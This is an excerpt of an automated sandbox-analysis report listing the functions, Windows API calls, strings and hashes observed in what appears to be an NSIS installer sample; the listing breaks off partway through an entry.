Opcode ID: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
Instruction ID: 9295a41ff54e91ce474836f10c0d971f7d59360bd190e5c91fe05c233bc104c6
Opcode Fuzzy Hash: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
Instruction Fuzzy Hash: 4D51D771900208ABDB119FA5DD85BAE7BA8EF04716F14417FE904B62D1DB7C8E808B9D

Function 004018D7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 00401917
CompareFileTime.KERNEL32(-00000014,?,101,101,00000000,00000000,101,004D40B0,00000000,00000000), ref: 00401946

Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5

Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00422579,74DF23A0,00000000), ref: 00404AAB
Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00422579,74DF23A0,00000000), ref: 00404ABB
Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E

Strings

101, xrefs: 004018F4, 004018FD, 0040190A, 0040191C, 00401932, 00401969, 0040197F, 0040199A, 004019D2, 00401A52, 00401A5B, 00401A65, 00401A70

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: 101
API String ID: 1941528284-1416650876
Opcode ID: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
Instruction ID: b4e8f227fe7a9537edd0b9e90a91ba8e6819ca8d144e35aa4a9caf99775b3aa4
Opcode Fuzzy Hash: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
Instruction Fuzzy Hash: 6941C471A00614AADB10AB758C85EAF3668EF45329F20423BF416B11E2C77C4A91DFAD

Function 0040172D Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405807: CharNextW.USER32(?,004CC0A0,0045FE18,?,00406059,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 00405815
Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000), ref: 00401757
GetLastError.KERNEL32 ref: 00401761
GetFileAttributesW.KERNELBASE(00000000), ref: 0040176F
SetCurrentDirectoryW.KERNELBASE(00000000,004D40B0,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040179F

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID:
API String ID: 3751793516-0
Opcode ID: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
Instruction ID: e2322852a9c4e47e6d687db6679f044b16e0241981b9ece66bf6cd58216f8cce
Opcode Fuzzy Hash: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
Instruction Fuzzy Hash: 3F01D631904621DBE7206B755D45B6F32A8EF14365B21063BF992F22E2D73C4C81866D

Function 0040592D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040594B
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403392,004DC0C0,004E00C8), ref: 00405966

Strings

nsa, xrefs: 0040593A

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
Instruction ID: 0cdccb08d4a0cf0f0df5d656a0a7939b265b1f1c47613fc9c1e0506998bbacb4
Opcode Fuzzy Hash: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
Instruction Fuzzy Hash: C9F06276610608EBDB109F55DE05E9B7BA9EF94720F00803BE984A7190E6B099548B58

Function 0040248E Relevance: 3.0, APIs: 2, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040154D: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587

RegDeleteValueW.KERNELBASE(00000000,00000000), ref: 004024AF
RegCloseKey.ADVAPI32(00000000), ref: 004024B8

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 28d58af51618036718c252708d6da1339e8b50d3138fddc83e0f4718e70968a2
Instruction ID: e1576bc29d89e2789c90d7360848647e5e88d3aa3db4fc6b5d334060f6266443
Opcode Fuzzy Hash: 28d58af51618036718c252708d6da1339e8b50d3138fddc83e0f4718e70968a2
Instruction Fuzzy Hash: FE01863250061197EB15EBA49A59B7F7274EB80758F21413FE402BB1E1C67C8D81865D

Function 0040139B Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7d139e0d7de234bcf6a700e513e47626535988416de2a1309b9d7b071a3250d9
Instruction ID: d821e5382ecf7e63f516690336e344d0ace40c90d4042eade43e4a0886427dd5
Opcode Fuzzy Hash: 7d139e0d7de234bcf6a700e513e47626535988416de2a1309b9d7b071a3250d9
Instruction Fuzzy Hash: 2801FF31A202209BEB155F35AC08B6B3698A784315F20427EF855F72F2D678CC829B8C

Function 004058FE Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 0a2f85832d22be582635bab1499ab015b7246acefa136c2a8fff2ea0c335f580
Instruction ID: 3557cad305de1e8d8744f7ed922a0974add56b4630c1d6058af0572804785a4b
Opcode Fuzzy Hash: 0a2f85832d22be582635bab1499ab015b7246acefa136c2a8fff2ea0c335f580
Instruction Fuzzy Hash: 0AD09E71654201EFEF099F20DE1AF6EBBA2EB84B01F11852CB692940E0DAB15819DB15

Function 004058DE Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,00406701,?,?,?), ref: 004058E2
SetFileAttributesW.KERNEL32(?,00000000), ref: 004058F5

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: 9bfeacdea6eb5f2932ef974784812b51c4f8f2d5e5736dd59436ec15d4266534
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 8DC01272404900AAC6001B34DF0881A7B22AB94331B258739B5BAE00F0CB3088A9AA18

Function 00401F9B Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(?,00000000,?,00000000,004D40B0,00000000), ref: 00401FEA

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 472f4eeaf3e5161a1656fb81187af857e571e343c78cb304711e9bc17c207397
Instruction ID: 63966a6383d29ffdfa22f329224652c183dd70f9b2d60f481563a5b1fdafd2c8
Opcode Fuzzy Hash: 472f4eeaf3e5161a1656fb81187af857e571e343c78cb304711e9bc17c207397
Instruction Fuzzy Hash: 6DF06232650224A6DB10BBB9DC86BAD37E89B44758F208537F601EA0E2D67CC8C18248

Function 0040154D Relevance: 1.5, APIs: 1, Instructions: 32
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5e993feb771b5cf26465967f746d5e6f11a2072fdff488fd80c6cb0f440dea5c
Instruction ID: 25f660db1a1e8629dce7ab52a77c94397c675d14e237935d7f32c5267cf96d12
Opcode Fuzzy Hash: 5e993feb771b5cf26465967f746d5e6f11a2072fdff488fd80c6cb0f440dea5c
Instruction Fuzzy Hash: E8F0377A250109BBD700DB59DD41FE637DCE744B94F148036FA09DB151C735E44187A9

Function 0040188D Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,?,?), ref: 004018A4

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 223388b599ff242e7ccadcd08180d40b3faf74b659585ba66a24a54107b5256e
Instruction ID: 00f5228fbcba69d7f7f389f47c449123412ef94834c0b690fd6e23632fde5db3
Opcode Fuzzy Hash: 223388b599ff242e7ccadcd08180d40b3faf74b659585ba66a24a54107b5256e
Instruction Fuzzy Hash: ABE04F32304255AAF340DBA4DD49B9E73A4DB40728F20423AEA15F60D1E3B49A84C769

Function 00402E9E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F3A,000000FF,00000004,00000000,00000000,00000000), ref: 00402EB5

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6eb761298bb8b99514d02d989ea50b9b43b036f115663e871731ccf59cb5bf7b
Instruction ID: bd695a607233752ff1959b473a7ca1503adc94cd5dff5db9087338bb7c64902f
Opcode Fuzzy Hash: 6eb761298bb8b99514d02d989ea50b9b43b036f115663e871731ccf59cb5bf7b
Instruction Fuzzy Hash: F0E08C322A0218BBCB219E91DE08AE73B5CEB047A2F008436B958E51D0D674D952DBF9

Function 00403360 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
Part of subcall function 00405AE7: CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72

CreateDirectoryW.KERNELBASE(004E00C8,00000000,004E00C8,004E00C8,004E00C8,00000002,0040359B), ref: 00403381

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: c9f98378969a177fcb370052af8fd256873b8aecdbe0e59b9a239e0623e805da
Instruction ID: d79b23296e172e3f7541ee3cb439833c7f4a864136be478e135bd67e808ea9fb
Opcode Fuzzy Hash: c9f98378969a177fcb370052af8fd256873b8aecdbe0e59b9a239e0623e805da
Instruction Fuzzy Hash: 54D09E11547D7561C56236663E46FDF151C8F52359F114077F540B51C25A6C0A8289ED

Function 004033EB Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(FFFFFFFF,00403659,?), ref: 004033F6

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b15d56c08097fff20514f368db00eea90c541c95b920032091ed5aa6df719ccb
Instruction ID: 11a803593133d0a8bb5f97cf02fa30ccca2668fa513f91d2e48bc3b8907970a3
Opcode Fuzzy Hash: b15d56c08097fff20514f368db00eea90c541c95b920032091ed5aa6df719ccb
Instruction Fuzzy Hash: 0EC0123060034096D1617F79AD0E7043E556780335BA04B39F0F6B00F1C77C4665552E

Function 00402ED0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032EE,?,?,?,?,00000000,004035D7,?), ref: 00402EDE

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 052875b64ac29a69a56fe5fa30ce1250d27c90eff136e832dd86e8876edcd7ee
Instruction ID: 4946e7aaa73dbe9c50503acfc76fe66090dc5a246f76b590ec387925aa062f70
Opcode Fuzzy Hash: 052875b64ac29a69a56fe5fa30ce1250d27c90eff136e832dd86e8876edcd7ee
Instruction Fuzzy Hash: 4EB09231140300AADA215F009E09F057B21AB90700F108824B291281F086712020EA0D

Function 00401646 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 00401656

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8dc5173ed66c8cb9375c8a62a6b21d0958b4d16d400b23e9b38b04bf0691659c
Instruction ID: b7a5ace7ee108f6bfae9467569b9736203130378aa17b3a4f183cff96938e45a
Opcode Fuzzy Hash: 8dc5173ed66c8cb9375c8a62a6b21d0958b4d16d400b23e9b38b04bf0691659c
Instruction Fuzzy Hash: 42D02233704200CBE700F7B8AE8942E33A4E71232D3200C3BD803F20A0D639C8C1822D

Non-executed Functions

Function 00405C70 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 00405C83
lstrlenW.KERNEL32(?), ref: 00405C90
GetVersionExW.KERNEL32(?), ref: 00405CEE

Part of subcall function 00405ADA: CharUpperW.USER32(?,00405CC5,?), ref: 00405AE0

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00405D2D
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00405D4C
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00405D56
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00405D61
FreeLibrary.KERNEL32(00000000), ref: 00405D98
GlobalFree.KERNEL32(?), ref: 00405DA1

Strings

Unknown, xrefs: 00405DC0
GetModuleBaseNameW, xrefs: 00405D58
EnumProcessModules, xrefs: 00405D4E
EnumProcesses, xrefs: 00405D46
Module32NextW, xrefs: 00405EA2
PSAPI.DLL, xrefs: 00405D28
Module32FirstW, xrefs: 00405E97
Process32NextW, xrefs: 00405E8C
CreateToolhelp32Snapshot, xrefs: 00405E79
Kernel32.DLL, xrefs: 00405E5F
Process32FirstW, xrefs: 00405E81

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
